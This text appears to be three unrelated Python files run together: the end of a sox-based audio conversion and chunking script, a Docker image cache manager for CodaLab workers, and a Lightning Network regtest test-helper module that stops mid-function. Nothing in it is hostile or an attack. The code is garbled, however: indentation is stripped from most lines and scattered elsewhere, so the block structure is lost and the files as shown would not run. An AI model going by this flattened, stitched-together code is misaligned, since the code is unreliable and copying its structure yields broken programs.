proc_size = sys.getsizeof(rb.read())
                                rb.close()
rb = None
except Exception as e:
rb = None
                            # Changed?
if (proc_file != check_file) \
or (proc_size != check_size):
check_file = proc_file
check_size = proc_size
check_time = time.time()
break
else:
                                # Has n seconds passed without change?
if ((time.time() - check_time)<0.75):
break
if (proc_file[-4:].lower() == '.wav' and proc_file[-8:].lower() != '.wrk.wav'):
f1 = proc_file
f2 = proc_file[:-4] + '.wrk.wav'
try:
os.rename(f1, f2)
proc_file = f2
except Exception as e:
pass
if (proc_file[-4:].lower() == '.mp3' and proc_file[-8:].lower() != '.wrk.mp3'):
f1 = proc_file
f2 = proc_file[:-4] + '.wrk.mp3'
try:
os.rename(f1, f2)
proc_file = f2
except Exception as e:
pass
if (proc_file[-8:].lower() == '.wrk.wav' or proc_file[-8:].lower() == '.wrk.mp3'):
f1 = proc_file
f2 = proc_file[:-8] + proc_file[-4:]
try:
os.rename(f1, f2)
proc_file = f2
except Exception as e:
pass
                        # Execution counter
self.proc_last = time.time()
self.proc_seq += 1
if (self.proc_seq > 9999):
self.proc_seq = 1
seq4 = '{:04}'.format(self.proc_seq)
seq2 = '{:02}'.format(self.proc_seq)
proc_name = proc_file.replace(path, '')
proc_name = proc_name[:-4]
work_name = self.proc_id + '.' + seq2
work_file = qPath_work + work_name + '.wav'
if (os.path.exists(work_file)):
os.remove(work_file)
sox = subprocess.Popen(['sox', '-q', proc_file, '-r', '16000', '-b', '16', '-c', '1', work_file, ], \
stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
sox.wait()
sox.terminate()
sox = None
if (os.path.exists(work_file)):
if (self.micDev.isdigit()):
os.remove(proc_file)
                            # Log
if (self.runMode == 'debug') or (not self.micDev.isdigit()):
qLog.log('info', self.proc_id, '' + proc_name + u' → ' + work_name, display=self.logDisp,)
                            # Set busy status
if (qFunc.statusCheck(self.fileBsy) == False):
qFunc.statusSet(self.fileBsy, True)
if (str(self.id) == '0'):
qFunc.statusSet(qBusy_s_wav, True)
                            # File size
work_size = 0
try:
rb = open(work_file, 'rb')
work_size = sys.getsizeof(rb.read())
                            rb.close()
rb = None
except Exception as e:
rb = None
                            # File split processing
self.proc_last = time.time()
self.sub_proc(seq4, proc_file, work_file, proc_name, work_size, base_byte, cn_s, )
if (not self.micDev.isdigit()):
base_byte += work_size - 44
time.sleep(1.00)
#except Exception as e:
# pass
            # Clear busy status
qFunc.statusSet(self.fileBsy, False)
if (str(self.id) == '0'):
qFunc.statusSet(qBusy_s_wav, False)
            # Exit when running as a batch
if (not self.micDev.isdigit()):
break
            # Idling
slow = False
if (qFunc.statusCheck(qBusy_dev_cpu) == True):
slow = True
elif (qFunc.statusCheck(qBusy_dev_mic) == True) \
and (qFunc.statusCheck(qRdy__s_force) == False) \
and (qFunc.statusCheck(qRdy__s_sendkey) == False):
slow = True
if (slow == True):
time.sleep(1.00)
else:
if (cn_r.qsize() == 0):
time.sleep(0.25)
else:
time.sleep(0.05)
        # Termination processing
if (True):
            # Clear ready status
qFunc.statusSet(self.fileRdy, False)
            # Clear busy status
qFunc.statusSet(self.fileBsy, False)
if (str(self.id) == '0'):
qFunc.statusSet(qBusy_s_wav, False)
            # Clear queues
while (cn_r.qsize() > 0):
cn_r_get = cn_r.get()
cn_r.task_done()
while (cn_s.qsize() > 0):
cn_s_get = cn_s.get()
cn_s.task_done()
            # Log
qLog.log('info', self.proc_id, 'end', display=self.logDisp, )
qFunc.statusSet(self.fileRun, False)
self.proc_beat = None
def sub_proc(self, seq4, proc_file, work_file, proc_name, work_size, base_byte, cn_s, ):
path = qPath_s_wav
nowTime = datetime.datetime.now()
stamp = nowTime.strftime('%Y%m%d.%H%M%S')
if (work_size >= int(self.minSize) and work_size <= int(self.maxSize+2000)):
if (self.micDev.isdigit()):
sec=int((work_size-44)/2/16000)
else:
sec=int(base_byte/2/16000)
hh = int(sec/3600)
mm = int((sec-hh*3600)/60)
ss = int(sec-hh*3600-mm*60)
tm = '{:02}{:02}{:02}'.format(hh,mm,ss)
fwork = path + stamp + '.' + proc_name + '(000).' + tm + '.wav'
fjuli = qPath_s_jul + stamp + '.' + proc_name + '(000).' + tm + '.wav'
frec = qPath_rec + stamp + '.' + proc_name + '(000).' + tm + '.mp3'
try:
qFunc.copy(work_file, fwork)
qFunc.copy(work_file, fjuli)
if (self.micDev.isdigit()):
sox = subprocess.Popen(['sox', '-q', work_file, '-r', '16000', '-b', '16', '-c', '1', frec, ], \
stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
sox.wait()
sox.terminate()
sox = None
                # Output result
if (cn_s.qsize() < 99):
out_name = 'filename'
out_value = fjuli
cn_s.put([out_name, out_value])
except Exception as e:
pass
if (work_size > int(self.maxSize+2000)):
sep_sec = int(self.maxSize/2/16000 - 1)
nn = 1
while (nn != 0):
ftrim = work_file[:-4] + '.trim.wav'
sox = subprocess.Popen(['sox', '-q', work_file, '-r', '16000', '-b', '16', '-c', '1', ftrim, 'trim', str((nn-1)*sep_sec), str(sep_sec+1), ], \
stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
sox.wait()
sox.terminate()
sox = None
ftrim_size = 0
try:
rb = open(ftrim, 'rb')
ftrim_size = sys.getsizeof(rb.read())
                    rb.close()
rb = None
except Exception as e:
rb = None
if (ftrim_size < int(self.minSize)):
os.remove(ftrim)
nn = 0
else:
if (self.micDev.isdigit()):
sec = int((ftrim_size-44)/2/16000)
else:
sec = int(base_byte/2/16000) + (nn-1)*sep_sec
hh = int(sec/3600)
mm = int((sec-hh*3600)/60)
ss = int(sec-hh*3600-mm*60)
tm = '{:02}{:02}{:02}'.format(hh,mm,ss)
fwork = path + stamp + '.' + proc_name + '(' + '{:03}'.format(nn) + ').' + tm + '.wav'
fjuli = qPath_s_jul + stamp + '.' + proc_name + '(' + '{:03}'.format(nn) + ').' + tm + '.wav'
frec = qPath_rec + stamp + '.' + proc_name + '(' + '{:03}'.format(nn) + ').' + tm + '.mp3'
try:
qFunc.copy(ftrim, fwork)
qFunc.copy(ftrim, fjuli)
if (self.micDev.isdigit()):
sox = subprocess.Popen(['sox', '-q', ftrim, '-r', '16000', '-b', '16', '-c', '1', frec, ], \
stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
sox.wait()
sox.terminate()
sox = None
                        # Output result
if (cn_s.qsize() < 99):
out_name = 'filename'
out_value = fjuli
cn_s.put([out_name, out_value])
except Exception as e:
pass
nn += 1
if __name__ == '__main__':
    # Common classes
qFunc.init()
    # Log
nowTime = datetime.datetime.now()
filename = qPath_log + nowTime.strftime('%Y%m%d.%H%M%S') + '.' + os.path.basename(__file__) + '.log'
qLog.init(mode='logger', filename=filename, )
    # Initial settings
qFunc.remove(qCtrl_control_speech)
qFunc.statusReset_speech(False)
    # Parameters
runMode = 'debug'
if (len(sys.argv) >= 2):
runMode = str(sys.argv[1]).lower()
    # Start
voice2wav_thread = proc_voice2wav('voice2wav', '0', runMode, )
voice2wav_thread.begin()
    # Test run
if (len(sys.argv) < 2):
chktime = time.time()
while ((time.time() - chktime) < 15):
res_data = voice2wav_thread.get()
res_name = res_data[0]
res_value = res_data[1]
if (res_name != ''):
print(res_name, res_value, )
if (voice2wav_thread.proc_s.qsize() == 0):
voice2wav_thread.put(['_status_', ''])
time.sleep(0.05)
    # Standalone run
if (len(sys.argv) >= 2):
        # Wait loop
while (True):
            # Check for termination
control = ''
txts, txt = qFunc.txtsRead(qCtrl_control_speech)
if (txts != False):
qLog.log('info', str(txt))
if (txt == '_end_'):
break
else:
qFunc.remove(qCtrl_control_speech)
control = txt
            # Messages
res_data = voice2wav_thread.get()
res_name = res_data[0]
res_value = res_data[1]
#if (res_name != ''):
# print(res_name, res_value, )
time.sleep(0.50)
    # Terminate
voice2wav_thread.abort()
del voice2wav_thread
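# Reference (illustrative): the conversion performed by main_proc above is equivalent to
# running sox by hand, resampling any file dropped into qPath_s_inp to the 16 kHz,
# 16-bit, mono WAV expected by the downstream speech-to-text stages:
#   sox -q input.wav -r 16000 -b 16 -c 1 output.wav
# Files whose converted size exceeds maxSize are additionally split by sub_proc using
# "sox ... trim <start> <duration>" into numbered chunks before being queued.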
|
docker_image_manager.py
|
from collections import namedtuple
import threading
import time
import traceback
import logging
import docker
import codalab.worker.docker_utils as docker_utils
from codalab.worker.fsm import DependencyStage
from codalab.worker.state_committer import JsonStateCommitter
from codalab.worker.worker_thread import ThreadDict
from codalab.lib.formatting import size_str
logger = logging.getLogger(__name__)
# Stores the download state of a Docker image (also includes the digest being pulled, digest string,
# DependencyStage and relevant status message from the download)
ImageAvailabilityState = namedtuple('ImageAvailabilityState', ['digest', 'stage', 'message'])
# Stores information relevant to caching of docker images
ImageCacheEntry = namedtuple(
'ImageCacheEntry', ['id', 'digest', 'last_used', 'virtual_size', 'marginal_size']
)
class DockerImageManager:
CACHE_TAG = 'codalab-image-cache/last-used'
def __init__(self, commit_file, max_image_cache_size, max_image_size):
"""
Initializes a DockerImageManager
:param commit_file: String path to where the state file should be committed
:param max_image_cache_size: Total size in bytes that the image cache can use
:param max_image_size: Total size in bytes that the image can have
"""
self._state_committer = JsonStateCommitter(commit_file) # type: JsonStateCommitter
self._docker = docker.from_env() # type: DockerClient
self._downloading = ThreadDict(
fields={'success': False, 'status': 'Download starting.'}, lock=True
)
self._max_image_cache_size = max_image_cache_size
self._max_image_size = max_image_size
self._stop = False
self._sleep_secs = 10
self._cleanup_thread = None
def start(self):
logger.info("Starting docker image manager")
if self._max_image_cache_size:
def cleanup_loop(self):
while not self._stop:
try:
self._cleanup()
except Exception:
traceback.print_exc()
time.sleep(self._sleep_secs)
self._cleanup_thread = threading.Thread(target=cleanup_loop, args=[self])
self._cleanup_thread.start()
def stop(self):
logger.info("Stopping docker image manager")
self._stop = True
logger.debug("Stopping docker image manager: stop the downloads threads")
self._downloading.stop()
if self._cleanup_thread:
logger.debug("Stopping docker image manager: stop the cleanup thread")
self._cleanup_thread.join()
logger.info("Stopped docker image manager")
def _get_cache_use(self):
return sum(
float(image.attrs['VirtualSize']) for image in self._docker.images.list(self.CACHE_TAG)
)
def _cleanup(self):
"""
Prunes the image cache for runs.
1. Only care about images we (this DockerImageManager) downloaded and know about.
2. We also try to prune any dangling docker images on the system.
3. We use sum of VirtualSize's, which is an upper bound on the disk use of our images:
in case no images share any intermediate layers, this will be the real disk use,
however if images share layers, the virtual size will count that layer's size for each
        image that uses it, even though it's stored only once on disk. The 'Size' field
accounts for the marginal size each image adds on top of the shared layers, but summing
those is not accurate either since the shared base layers need to be counted once to get
the total size. (i.e. summing marginal sizes would give us a lower bound on the total disk
use of images). Calling df gives us an accurate disk use of ALL the images on the machine
but because of (1) we don't want to use that.
"""
# Sort the image cache in LRU order
def last_used(image):
for tag in image.tags:
if tag.split(":")[0] == self.CACHE_TAG:
return float(tag.split(":")[1])
cache_use = self._get_cache_use()
if cache_use > self._max_image_cache_size:
logger.info(
'Disk use (%s) > max cache size (%s): starting image pruning',
cache_use,
self._max_image_cache_size,
)
all_images = self._docker.images.list(self.CACHE_TAG)
all_images_sorted = sorted(all_images, key=last_used)
logger.info("Cached docker images: {}".format(all_images_sorted))
for image in all_images_sorted:
# We re-list all the images to get an updated total size since we may have deleted some
cache_use = self._get_cache_use()
if cache_use > self._max_image_cache_size:
image_tag = (
image.attrs['RepoTags'][-1]
if len(image.attrs['RepoTags']) > 0
else '<none>'
)
logger.info(
'Disk use (%s) > max cache size (%s), pruning image: %s',
cache_use,
self._max_image_cache_size,
image_tag,
)
try:
self._docker.images.remove(image.id, force=True)
except docker.errors.APIError as err:
# Two types of 409 Client Error can be thrown here:
# 1. 409 Client Error: Conflict ("conflict: unable to delete <image_id> (cannot be forced)")
# This happens when an image either has a running container or has multiple child dependents.
# 2. 409 Client Error: Conflict ("conflict: unable to delete <image_id> (must be forced)")
# This happens when an image is referenced in multiple repositories.
                        # We can only force-remove images in the 2nd case, not in the 1st. So if removal with
                        # force=True fails, we were most likely dealing with the 1st case. Since we can't do
                        # much about those images, we just continue, hoping they get deleted once they are no
                        # longer in use and the cache fills up again.
logger.error(
"Cannot forcibly remove image %s from cache: %s", image_tag, err
)
logger.debug("Stopping docker image manager cleanup")
def get(self, image_spec):
"""
        Always request the newest docker image from Docker Hub if it's not already in a downloading thread, and
        return the current download status (READY, FAILED, or DOWNLOADING).
        Depending on the state of the requested image:
        1. If it's not available on the host, we start downloading the image and return DOWNLOADING status.
        2. If another thread is actively downloading it, we return DOWNLOADING status.
        3. If another thread was downloading it but is no longer active by the time the request was sent, we return:
            * READY if the image was downloaded successfully.
            * FAILED if the image couldn't be downloaded for any reason.
        :param image_spec: Repo image_spec of the docker image being requested
        :returns: An ImageAvailabilityState object with the state of the docker image
"""
def image_availability_state(image_spec, success_message, failure_message):
"""
Try to get the image specified by image_spec from host machine.
Return ImageAvailabilityState.
"""
try:
image = self._docker.images.get(image_spec)
digests = image.attrs.get('RepoDigests', [image_spec])
digest = digests[0] if len(digests) > 0 else None
new_timestamp = str(time.time())
image.tag(self.CACHE_TAG, tag=new_timestamp)
for tag in image.tags:
tag_label, timestamp = tag.split(":")
# remove any other timestamp but not the current one
if tag_label == self.CACHE_TAG and timestamp != new_timestamp:
self._docker.images.remove(tag)
return ImageAvailabilityState(
digest=digest, stage=DependencyStage.READY, message=success_message
)
except Exception as ex:
return ImageAvailabilityState(
digest=None, stage=DependencyStage.FAILED, message=failure_message % ex
)
if ':' not in image_spec:
# Both digests and repo:tag kind of specs include the : character. The only case without it is when
# a repo is specified without a tag (like 'latest')
# When this is the case, different images API methods act differently:
# - pull pulls all tags of the image
# - get tries to get `latest` by default
# That means if someone requests a docker image without a tag, and the image does not have a latest
# tag pushed to Dockerhub, pull will succeed since it will pull all other tags, but later get calls
# will fail since the `latest` tag won't be found on the system.
# We don't want to assume what tag the user wanted so we want the pull step to fail if no tag is specified
# and there's no latest tag on dockerhub.
            # Hence, we append the ':latest' tag to the image spec right at the beginning if no tag was specified.
image_spec += ':latest'
try:
if image_spec in self._downloading:
with self._downloading[image_spec]['lock']:
if self._downloading[image_spec].is_alive():
return ImageAvailabilityState(
digest=None,
stage=DependencyStage.DOWNLOADING,
message=self._downloading[image_spec]['status'],
)
else:
if self._downloading[image_spec]['success']:
status = image_availability_state(
image_spec,
success_message='Image ready',
failure_message='Image {} was downloaded successfully, '
'but it cannot be found locally due to unhandled error %s'.format(
image_spec
),
)
else:
status = image_availability_state(
image_spec,
                                success_message='Image {} cannot be downloaded from DockerHub, '
                                'but it was found locally'.format(image_spec),
failure_message=self._downloading[image_spec]['message'] + ": %s",
)
self._downloading.remove(image_spec)
return status
else:
def download():
logger.debug('Downloading Docker image %s', image_spec)
try:
self._docker.images.pull(image_spec)
logger.debug('Download for Docker image %s complete', image_spec)
self._downloading[image_spec]['success'] = True
self._downloading[image_spec]['message'] = "Downloading image"
except (docker.errors.APIError, docker.errors.ImageNotFound) as ex:
logger.debug('Download for Docker image %s failed: %s', image_spec, ex)
self._downloading[image_spec]['success'] = False
self._downloading[image_spec][
'message'
] = "Can't download image: {}".format(ex)
# Check docker image size before pulling from Docker Hub.
# Do not download images larger than self._max_image_size
# Download images if size cannot be obtained
try:
image_size_bytes = docker_utils.get_image_size_without_pulling(image_spec)
if image_size_bytes > self._max_image_size:
failure_msg = (
"The size of "
+ image_spec
+ ": {} exceeds the maximum image size allowed {}.".format(
size_str(image_size_bytes), size_str(self._max_image_size)
)
)
return ImageAvailabilityState(
digest=None, stage=DependencyStage.FAILED, message=failure_msg
)
except Exception as ex:
                    logger.warning("Cannot fetch image size beforehand: %s", ex)
self._downloading.add_if_new(image_spec, threading.Thread(target=download, args=[]))
return ImageAvailabilityState(
digest=None,
stage=DependencyStage.DOWNLOADING,
message=self._downloading[image_spec]['status'],
)
except Exception as ex:
return ImageAvailabilityState(
digest=None, stage=DependencyStage.FAILED, message=str(ex)
)
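# --- Usage sketch (illustrative only) ---
# A minimal polling loop against the manager. The commit-file path, the size limits and
# the image spec below are hypothetical example values, not defaults of this module.
def _example_image_manager_usage():
    manager = DockerImageManager(
        commit_file='/tmp/images-state.json',  # hypothetical state file location
        max_image_cache_size=10 * 1024 ** 3,   # 10 GiB cache budget
        max_image_size=5 * 1024 ** 3,          # reject images larger than 5 GiB
    )
    manager.start()
    try:
        state = manager.get('ubuntu:18.04')
        while state.stage == DependencyStage.DOWNLOADING:
            time.sleep(1)
            state = manager.get('ubuntu:18.04')
        logger.info("Image state: %s (%s)", state.stage, state.message)
    finally:
        manager.stop()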
|
utils.py
|
import logging
import os
import random
import re
import shutil
import sqlite3
import string
import subprocess
import threading
import time
from btcproxy import BitcoinRpcProxy
from bitcoin.rpc import RawProxy as BitcoinProxy
from decimal import Decimal
from ephemeral_port_reserve import reserve
from lightning import LightningRpc
BITCOIND_CONFIG = {
"regtest": 1,
"rpcuser": "rpcuser",
"rpcpassword": "rpcpass",
}
LIGHTNINGD_CONFIG = {
"log-level": "debug",
"cltv-delta": 6,
"cltv-final": 5,
"watchtime-blocks": 5,
"rescan": 1,
'disable-dns': None,
}
with open('config.vars') as configfile:
config = dict([(line.rstrip().split('=', 1)) for line in configfile])
DEVELOPER = os.getenv("DEVELOPER", config['DEVELOPER']) == "1"
TIMEOUT = int(os.getenv("TIMEOUT", "60"))
VALGRIND = os.getenv("VALGRIND", config['VALGRIND']) == "1"
SLOW_MACHINE = os.getenv("SLOW_MACHINE", "0") == "1"
def wait_for(success, timeout=TIMEOUT):
start_time = time.time()
interval = 0.25
while not success() and time.time() < start_time + timeout:
time.sleep(interval)
interval *= 2
if interval > 5:
interval = 5
if time.time() > start_time + timeout:
        raise ValueError("Error waiting for {}".format(success))
def write_config(filename, opts, regtest_opts=None):
with open(filename, 'w') as f:
for k, v in opts.items():
f.write("{}={}\n".format(k, v))
if regtest_opts:
f.write("[regtest]\n")
for k, v in regtest_opts.items():
f.write("{}={}\n".format(k, v))
def only_one(arr):
"""Many JSON RPC calls return an array; often we only expect a single entry
"""
assert len(arr) == 1
return arr[0]
def sync_blockheight(bitcoind, nodes):
height = bitcoind.rpc.getblockchaininfo()['blocks']
for n in nodes:
wait_for(lambda: n.rpc.getinfo()['blockheight'] == height)
def wait_channel_quiescent(n1, n2):
wait_for(lambda: only_one(only_one(n1.rpc.listpeers(n2.info['id'])['peers'])['channels'])['htlcs'] == [])
wait_for(lambda: only_one(only_one(n2.rpc.listpeers(n1.info['id'])['peers'])['channels'])['htlcs'] == [])
class TailableProc(object):
"""A monitorable process that we can start, stop and tail.
This is the base class for the daemons. It allows us to directly
tail the processes and react to their output.
"""
def __init__(self, outputDir=None, verbose=True):
self.logs = []
self.logs_cond = threading.Condition(threading.RLock())
self.env = os.environ.copy()
self.running = False
self.proc = None
self.outputDir = outputDir
self.logsearch_start = 0
# Should we be logging lines we read from stdout?
self.verbose = verbose
# A filter function that'll tell us whether to filter out the line (not
# pass it to the log matcher and not print it to stdout).
self.log_filter = lambda line: False
def start(self):
"""Start the underlying process and start monitoring it.
"""
logging.debug("Starting '%s'", " ".join(self.cmd_line))
self.proc = subprocess.Popen(self.cmd_line, stdout=subprocess.PIPE, env=self.env)
self.thread = threading.Thread(target=self.tail)
self.thread.daemon = True
self.thread.start()
self.running = True
def save_log(self):
if self.outputDir:
logpath = os.path.join(self.outputDir, 'log')
with open(logpath, 'w') as f:
for l in self.logs:
f.write(l + '\n')
def stop(self, timeout=10):
self.save_log()
self.proc.terminate()
# Now give it some time to react to the signal
rc = self.proc.wait(timeout)
if rc is None:
self.proc.kill()
self.proc.wait()
self.thread.join()
if self.proc.returncode:
raise ValueError("Process '{}' did not cleanly shutdown: return code {}".format(self.proc.pid, rc))
return self.proc.returncode
def kill(self):
"""Kill process without giving it warning."""
self.proc.kill()
self.proc.wait()
self.thread.join()
def tail(self):
"""Tail the stdout of the process and remember it.
Stores the lines of output produced by the process in
self.logs and signals that a new line was read so that it can
be picked up by consumers.
"""
for line in iter(self.proc.stdout.readline, ''):
if len(line) == 0:
break
if self.log_filter(line.decode('ASCII')):
continue
if self.verbose:
logging.debug("%s: %s", self.prefix, line.decode().rstrip())
with self.logs_cond:
self.logs.append(str(line.rstrip()))
self.logs_cond.notifyAll()
self.running = False
self.proc.stdout.close()
def is_in_log(self, regex, start=0):
"""Look for `regex` in the logs."""
ex = re.compile(regex)
for l in self.logs[start:]:
if ex.search(l):
logging.debug("Found '%s' in logs", regex)
return l
logging.debug("Did not find '%s' in logs", regex)
return None
def wait_for_logs(self, regexs, timeout=TIMEOUT):
"""Look for `regexs` in the logs.
We tail the stdout of the process and look for each regex in `regexs`,
starting from last of the previous waited-for log entries (if any). We
fail if the timeout is exceeded or if the underlying process
exits before all the `regexs` were found.
If timeout is None, no time-out is applied.
"""
logging.debug("Waiting for {} in the logs".format(regexs))
exs = [re.compile(r) for r in regexs]
start_time = time.time()
pos = self.logsearch_start
while True:
if timeout is not None and time.time() > start_time + timeout:
print("Time-out: can't find {} in logs".format(exs))
for r in exs:
if self.is_in_log(r):
print("({} was previously in logs!)".format(r))
raise TimeoutError('Unable to find "{}" in logs.'.format(exs))
elif not self.running:
raise ValueError('Process died while waiting for logs')
with self.logs_cond:
if pos >= len(self.logs):
self.logs_cond.wait(1)
continue
for r in exs.copy():
self.logsearch_start = pos + 1
if r.search(self.logs[pos]):
logging.debug("Found '%s' in logs", r)
exs.remove(r)
break
if len(exs) == 0:
return self.logs[pos]
pos += 1
def wait_for_log(self, regex, timeout=TIMEOUT):
"""Look for `regex` in the logs.
Convenience wrapper for the common case of only seeking a single entry.
"""
return self.wait_for_logs([regex], timeout)
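    # Example (illustrative): callers typically block on specific daemon output, e.g.
    #   proc.wait_for_log(r'Server started with public key')
    # or wait for several related entries at once:
    #   proc.wait_for_logs([r'Funding tx .* depth', 'to CHANNELD_NORMAL'])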
class SimpleBitcoinProxy:
"""Wrapper for BitcoinProxy to reconnect.
Long wait times between calls to the Bitcoin RPC could result in
`bitcoind` closing the connection, so here we just create
throwaway connections. This is easier than to reach into the RPC
library to close, reopen and reauth upon failure.
"""
def __init__(self, btc_conf_file, *args, **kwargs):
self.__btc_conf_file__ = btc_conf_file
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
# Create a callable to do the actual call
proxy = BitcoinProxy(btc_conf_file=self.__btc_conf_file__)
def f(*args):
return proxy._call(name, *args)
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
class BitcoinD(TailableProc):
    def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
        TailableProc.__init__(self, bitcoin_dir, verbose=False)
        if rpcport is None:
            rpcport = reserve()
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.prefix = 'chipsd'
self.cmd_line = [
'chipsd',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
]
# For up to and including 0.16.1, this needs to be in main section.
BITCOIND_CONFIG['rpcport'] = rpcport
        # For after 0.16.1 (eg. 3f398d7a17f136cd4a67998406ca41a124ae2966), this
        # needs its own [regtest] section.
        BITCOIND_REGTEST = {'rpcport': rpcport}
        btc_conf_file = os.path.join(bitcoin_dir, 'chips.conf')
        write_config(btc_conf_file, BITCOIND_CONFIG, BITCOIND_REGTEST)
self.rpc = SimpleBitcoinProxy(btc_conf_file=btc_conf_file)
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=TIMEOUT)
logging.info("BitcoinD started")
def generate_block(self, numblocks=1):
# As of 0.16, generate() is removed; use generatetoaddress.
return self.rpc.generatetoaddress(numblocks, self.rpc.getnewaddress())
class LightningD(TailableProc):
def __init__(self, lightning_dir, bitcoind, port=9735, random_hsm=False, node_id=0):
TailableProc.__init__(self, lightning_dir)
self.executable = 'lightningd/lightningd'
self.lightning_dir = lightning_dir
self.port = port
self.cmd_prefix = []
self.disconnect_file = None
self.rpcproxy = BitcoinRpcProxy(bitcoind)
self.opts = LIGHTNINGD_CONFIG.copy()
opts = {
'lightning-dir': lightning_dir,
'addr': '127.0.0.1:{}'.format(port),
'allow-deprecated-apis': 'false',
'network': 'regtest',
'ignore-fee-limits': 'false',
'bitcoin-rpcuser': BITCOIND_CONFIG['rpcuser'],
'bitcoin-rpcpassword': BITCOIND_CONFIG['rpcpassword'],
}
for k, v in opts.items():
self.opts[k] = v
if not os.path.exists(lightning_dir):
os.makedirs(lightning_dir)
# Last 32-bytes of final part of dir -> seed.
seed = (bytes(re.search('([^/]+)/*$', lightning_dir).group(1), encoding='utf-8') + bytes(32))[:32]
if not random_hsm:
with open(os.path.join(lightning_dir, 'hsm_secret'), 'wb') as f:
f.write(seed)
if DEVELOPER:
self.opts['dev-broadcast-interval'] = 1000
self.opts['dev-bitcoind-poll'] = 1
self.prefix = 'lightningd-%d' % (node_id)
def cleanup(self):
# To force blackhole to exit, disconnect file must be truncated!
if self.disconnect_file:
with open(self.disconnect_file, "w") as f:
f.truncate()
@property
def cmd_line(self):
opts = []
for k, v in sorted(self.opts.items()):
if v is None:
opts.append("--{}".format(k))
elif isinstance(v, list):
for i in v:
opts.append("--{}={}".format(k, i))
else:
opts.append("--{}={}".format(k, v))
return self.cmd_prefix + [self.executable] + opts
def start(self):
self.rpcproxy.start()
self.opts['bitcoin-rpcport'] = self.rpcproxy.rpcport
TailableProc.start(self)
self.wait_for_log("Server started with public key")
logging.info("LightningD started")
def wait(self, timeout=10):
"""Wait for the daemon to stop for up to timeout seconds
Returns the returncode of the process, None if the process did
not return before the timeout triggers.
"""
self.proc.wait(timeout)
self.rpcproxy.stop()
return self.proc.returncode
class LightningNode(object):
def __init__(self, daemon, rpc, btc, executor, may_fail=False, may_reconnect=False):
self.rpc = rpc
self.daemon = daemon
self.bitcoin = btc
self.executor = executor
self.may_fail = may_fail
self.may_reconnect = may_reconnect
def openchannel(self, remote_node, capacity, addrtype="p2sh-segwit", confirm=True, announce=True, connect=True):
addr, wallettxid = self.fundwallet(10 * capacity, addrtype)
if connect and remote_node.info['id'] not in [p['id'] for p in self.rpc.listpeers()['peers']]:
self.rpc.connect(remote_node.info['id'], '127.0.0.1', remote_node.daemon.port)
fundingtx = self.rpc.fundchannel(remote_node.info['id'], capacity)
# Wait for the funding transaction to be in bitcoind's mempool
wait_for(lambda: fundingtx['txid'] in self.bitcoin.rpc.getrawmempool())
if confirm or announce:
self.bitcoin.generate_block(1)
if announce:
self.bitcoin.generate_block(5)
if confirm or announce:
self.daemon.wait_for_log(
r'Funding tx {} depth'.format(fundingtx['txid']))
return {'address': addr, 'wallettxid': wallettxid, 'fundingtx': fundingtx}
def fundwallet(self, sats, addrtype="p2sh-segwit"):
addr = self.rpc.newaddr(addrtype)['address']
txid = self.bitcoin.rpc.sendtoaddress(addr, sats / 10**8)
self.bitcoin.generate_block(1)
self.daemon.wait_for_log('Owning output .* txid {}'.format(txid))
return addr, txid
def getactivechannels(self):
return [c for c in self.rpc.listchannels()['channels'] if c['active']]
def db_query(self, query, use_copy=True):
orig = os.path.join(self.daemon.lightning_dir, "lightningd.sqlite3")
if use_copy:
copy = os.path.join(self.daemon.lightning_dir, "lightningd-copy.sqlite3")
shutil.copyfile(orig, copy)
db = sqlite3.connect(copy)
else:
db = sqlite3.connect(orig)
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
rows = c.fetchall()
result = []
for row in rows:
result.append(dict(zip(row.keys(), row)))
db.commit()
c.close()
db.close()
return result
# Assumes node is stopped!
def db_manip(self, query):
db = sqlite3.connect(os.path.join(self.daemon.lightning_dir, "lightningd.sqlite3"))
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
db.commit()
c.close()
db.close()
def start(self):
self.daemon.start()
# Cache `getinfo`, we'll be using it a lot
self.info = self.rpc.getinfo()
# This shortcut is sufficient for our simple tests.
self.port = self.info['binding'][0]['port']
def stop(self, timeout=10):
""" Attempt to do a clean shutdown, but kill if it hangs
"""
# Tell the daemon to stop
try:
# May fail if the process already died
self.rpc.stop()
except Exception:
pass
rc = self.daemon.wait(timeout)
# If it did not stop be more insistent
if rc is None:
rc = self.daemon.stop()
self.daemon.save_log()
self.daemon.cleanup()
if rc != 0 and not self.may_fail:
raise ValueError("Node did not exit cleanly, rc={}".format(rc))
else:
return rc
def restart(self, timeout=10, clean=True):
"""Stop and restart the lightning node.
Keyword arguments:
timeout: number of seconds to wait for a shutdown
clean: whether to issue a `stop` RPC command before killing
"""
if clean:
self.stop(timeout)
else:
self.daemon.stop()
self.start()
def fund_channel(self, l2, amount, wait_for_active=True):
# Give yourself some funds to work with
addr = self.rpc.newaddr()['address']
self.bitcoin.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
numfunds = len(self.rpc.listfunds()['outputs'])
self.bitcoin.generate_block(1)
wait_for(lambda: len(self.rpc.listfunds()['outputs']) > numfunds)
# Now go ahead and open a channel
num_tx = len(self.bitcoin.rpc.getrawmempool())
tx = self.rpc.fundchannel(l2.info['id'], amount)['tx']
wait_for(lambda: len(self.bitcoin.rpc.getrawmempool()) == num_tx + 1)
self.bitcoin.generate_block(1)
# Hacky way to find our output.
scid = None
decoded = self.bitcoin.rpc.decoderawtransaction(tx, True)
for out in decoded['vout']:
if out['scriptPubKey']['type'] == 'witness_v0_scripthash':
if out['value'] == Decimal(amount) / 10**8:
scid = "{}:1:{}".format(self.bitcoin.rpc.getblockcount(), out['n'])
break
if not scid:
# Intermittent decoding failure. See if it decodes badly twice?
decoded2 = self.bitcoin.rpc.decoderawtransaction(tx)
raise ValueError("Can't find {} payment in {} (1={} 2={})".format(amount, tx, decoded, decoded2))
if wait_for_active:
# We wait until gossipd sees both local updates, as well as status NORMAL,
# so it can definitely route through.
